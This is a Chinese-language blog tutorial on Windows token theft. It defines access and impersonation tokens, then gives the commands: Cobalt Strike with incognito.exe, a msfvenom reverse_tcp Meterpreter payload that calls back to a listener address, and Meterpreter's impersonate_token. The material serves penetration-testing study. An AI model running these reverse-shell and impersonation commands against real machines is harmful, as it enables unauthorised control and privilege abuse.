首页 > 系统相关 >Windows令牌窃取攻击

Windows令牌窃取攻击

时间:2023-09-09 18:11:07浏览次数:46  
标签:令牌 Windows 攻击 Token 窃取 incognito

Windows令牌窃取攻击

目录

一、Windows令牌

令牌(Token)是系统的临时密钥,相当于账户名和密码,用来决定是否允许这次请求和判断这次请求是属于哪一个用户的,它允许你在不提供密码或其他凭证的前提下,访问网络和系统资源,这些令牌持续存在系统中,除非系统重新启动。

Windows令牌种类:
(1)访问令牌(Access Token)表示访问控制操作主题的系统对象
(2)会话令牌(Session Token)是交互会话中唯一的身份标识符
(3)保密令牌(Security Token)又叫认证令牌或硬件令牌,是一种计算机身份校验的物理设备

Windows访问令牌又分为:
(1)授权令牌(Delegation Token),也叫主令牌,支持交互式会话登录(例如本地用户登录、远程桌面登录)
(2)模拟令牌(Impresonation Token)支持非交互的会话(例如使用 net use访问共享文件夹)

二、令牌窃取攻击

前提:拿到的用户是过了UAC的管理员

1、通过CS进行令牌攻击

(1)通过CS控制了一个过了UAC的管理员

(2)列出用户的令牌

shell incognito.exe list_tokens -u

(3)使用窃取的令牌进行上线

shell incognito.exe execute -c "XB\Administrator" C:\Users\test\Desktop\win10-3\can.exe

2、通过msf进行令牌攻击

(1)通过msfvenom生成木马

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.142.133 lport=4567 -f exe -o payload.exe

(2)进入msfconsole进行监听

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.142.133
set lport 4567
run

(3)加载incognito,进行令牌攻击

load incognito   		                #加载incognito
list_tokens -u    		                #列举令牌
impersonate_token "XB\Administrator" 	#令牌攻击
rev2self 或 drop_token                  #返回之前token

标签:令牌,Windows,攻击,Token,窃取,incognito
From: https://www.cnblogs.com/candada/p/17689944.html

相关文章

  • Windowsapp文件夹权限问题
    MicrosoftStore安装应用提示错误以及Windowsapps权限问题问题描述在Windows10/11MicrosoftStore上安装应用时,提示错误0x80070005,无法安装通过搜索相关问题,尝试手动下载appx程序时,仍然提示错误0x80070005,但相比MicrosoftStore安装,appx程序错误指出了C:\ProgramFiles\Window......
  • Windows平台 CLion 远程调试 Linux 的 C++ 程序
    Windows平台CLion远程调试Linux的C++程序1.CLion的安装Pass2.Linux环境的配置2.1.安装gdbserver这里举例Ubuntu环境下的安装:sudoapt-getinstallgdbserver2.2配置CLion2.2.1.配置Toolchains首先在CLion的File->Settings->Tools->SSHConfigu......
  • 下载Windows 10 光盘映像(ISO 文件)
    转载:微软官网win10下载步骤教程-常见问题-PHP中文网1.微软地址:microsoft.com/zh-cn/software-download/windows10ISO/2.win10下载:下载Windows10(microsoft.com) win10专业版ios下载地址:商用Windows10专业版–Microsoft ......
  • Windows安装虚拟机软件——VirtualBox
    1、VirtualBox简介VirtualBox号称是最强的开源免费虚拟机软件,它不仅具有丰富的特色,而且性能也很优异。它简单易用,可虚拟的系统包括Windows、MacOSX、Linux、OpenBSD、Solaris、IBMOS2甚至Android等操作系统。使用者可以在VirtualBox上安装并且运行上述的这些操作系统......
  • Linux与Windows双系统,安装完linux后无法通过grub进入Windows的解决方法
    其中有提示,所以解决方案也非常明确Warning:os-proberwillnotbeexecutedtodetectotherbootablepartitions.SystemsonthemwillnotbeaddedtotheGRUBbootconfiguration.CheckGRUB_DISABLE_OS_PROBERdocumentationentry.可以参考:https://huaweicloud.cs......
  • py文件转换成exe文件在windows上允运行 有没有什么好方法?
    大家好,我是皮皮。一、前言前几天在Python最强王者群【哎呦喂 是豆子~】问了一个Python打包的问题,一起来看看吧。py文件转换成exe文件在windows上允运行有没有什么好方法?window上没有python。二、实现过程这里【瑜亮老师】给了一个思路和指导,如下:把用到的库你复制过去,开始......
  • # yyds干货盘点 # py文件转换成exe文件在windows上允运行 有没有什么好方法?
    大家好,我是皮皮。一、前言前几天在Python最强王者群【哎呦喂 是豆子~】问了一个Python打包的问题,一起来看看吧。py文件转换成exe文件在windows上允运行有没有什么好方法?window上没有python。二、实现过程这里【瑜亮老师】给了一个思路和指导,如下:把用到的库你复制过去,开始打包。【......
  • Windows中安装Elasticsearch
    链接:https://pan.baidu.com/s/1-EsuGaw0_9ubw5_9AhRS2Q提取码:1hp4一,Elasticsearch环境准备elasticsearch-5.6.8.zip进行解压(安装目录随意)启动服务:   访问http://127.0.0.1:9200,显示如下:表明elasticsearch启动......
  • Windows 安装 RabbitMq
    Windows上安装RabbitMQ的步骤RabbitMQ是一个强大的开源消息队列系统,广泛用于构建分布式、可扩展的应用程序。本教程将带您一步一步完成在Windows系统上安装RabbitMQ的过程。无需担心,即使您是初学者,也能够轻松跟随这些简单的步骤来完成安装。步骤1:安装ErlangRabbitMQ是使......
  • Windows访问Linux下的FTP服务器(Centos和Uuntu)
    centos7.9版本1.下载FTP离线安装包:http://rpmfind.net/linux/rpm2html/search.php?query=vsftpd(x86-64)   选择最后一个 vsftpd-3.0.2-28.el7.x86_64.rpm2.检查是否已经安装了vsftprpm-qa|grepvsftpd出现提示vsftpd版本号则表示......